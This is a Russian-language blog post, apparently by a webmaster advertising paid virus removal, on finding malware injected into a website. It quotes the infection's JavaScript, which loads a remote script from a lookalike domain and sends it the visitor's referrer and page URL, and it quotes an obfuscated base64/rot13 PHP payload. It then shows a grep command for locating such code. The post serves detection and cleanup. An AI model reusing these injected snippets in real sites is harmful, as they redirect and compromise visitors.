Вирус на сайте? удалить вирус с сайта

на сайте вирус, как удалить его

Недавно столкнулся с вирусом на сайте, который очень плохо влияет на сайт. Как влияет?

— яндекс пишет, что сайт заражен. Т.е. посетители уходят к конкурентам в большом количестве.

— зайдя на сайт, антивирусы воюют.. и люди уходят с сайта.

— браузеры ругаются, люди уходят.

Влияет негативно.

var gaJsHost = ((«http:» == document.location.protocol) ? «http://yandex» : «http://yandex»); document.write(unescape(«%3Cscript src='» + gaJsHost + «-yandex.uni.cc/verify-v1?id=»+Math.floor(Math.random() *30000)+»&group=2&seoref=»+encodeURIComponent(document.referrer)+ «&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=»+encodeURIComponent(document.URL)+»&default_keyword=’ type=’text/javascript’%3E%3C/script%3E»));

Был вот такой красивый вирус, с таким кодом. Это то, что отображалось на каждой странице сайта.

Как найти вирус  и удалить его?

Ищется довольно легко, вариантов не много.
Первый — это прямая вставка в код в открытом виде. Но ведь я тогда был бы не нужен, верно?
Второй вариант — использование обфускаторов, то есть вместо «hello» мы получаем набор букв и символов вида «aGVsbG8=». Основной поддержкой такой обфускации является вызов base64. Вредоносный код, к примеру, может быть записан в таком виде:

Код:

$somecrainsignvar="ny2fmed8"; echo base64_decode(str_rot13('VQkmL3WcpUD+V
N0XqzSlVTquFaAVo3A0VQ0tXPtvnUE0pQbvVQ09
VTEiL3IgMJ50YzkiL2S0nJ9hYaOlo3EiL29fXFN/VPWbqUEjBv8irJShMT
I4VvN6VPWbqUEjBv8irJShMTI4Vvx7VTEiL3IgMJ50YaqlnKEyXUIhMKAwLKOyXPVyZ0AmL3WcpUDtp
3WwCFpvVPftM2SXp0uip3DtXlNvYKyuozEyrP51ozxhL2ZiqzIlnJM5YKLkC2yxCFVeGJS0nP5zoT9i
pvuALKEbYaWuozEioFtcVPbmZQNjZPxeVvMapz91pQ0lWaAyo3WyMw0vX2IhL29xMIIFFHAio
OiozIhqPuxo2A1oJIhqP5lMJMypaWypvxeVPVzpTSlLJ1yqTIlCFEeMKy3o3WxWaAyCFEmMF
M1pw0kWxuHISOsHxITEIWSHw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2
A1oJIhqP5IHxjcXlVzMTIzLKIfqS9eMKy3o3WxCFptqUyjMG0aqTI4qP9dLKMup2
AlnKO0WlHmEFHmDl9mL3WcpUDyZ0HvXFx7QDbtCP9mL3WcpUD+VN==')); $crain="";

… но у всех таких обфускаций есть одно общее — упоминание «base64_decode«, что используется на здоровых сайтах довольно редко, да и то в шаблонах, поэтому условно считаем любой найденных фрагмент «base64_decode» вредоносным кодом.

Теперь как искать:
1) Нужен дамп всех файлов сайта.
2) Нужно устройство для поиска, но так как я использую для работы OS Ubuntu, то у меня по умолчанию есть шустрая команда ‘grep’, которая позволяет искать текст в указанной папке. Запрос на поиск довольно прост: «grep <параметры> <текст для поиска> <путь для поиска>. К примеру наш запрос может иметь следующий вид: «grep -rl base64_decode /home/www/site.ru», где <grep> — вызов команды, <-rl> — указание на включение в поиск всех вложенных папок в основную для поиска (r = рекурсивно = все папки, что будут в папке для поиска), <base64_decode> — фраза для поиска, </home/www/site.ru> — путь для поиска.

И да, grep по умолчанию доступен в большинстве дистрибутивов Linux и *BSD, поэтому если у Вас есть доступ к ssh на сервере, то искать вирусную вставку можно прямо с сервера, не выкачивая файлы сайта.

Если вы хотите, чтобы я вам удалил вирус. То пишите на почту admin@seolo.ru или nik2019@mail.ru

Услуги: стоимость удаления вируса 2500р.

Be the first to comment on "Вирус на сайте? удалить вирус с сайта"

Leave a comment

Your email address will not be published.


*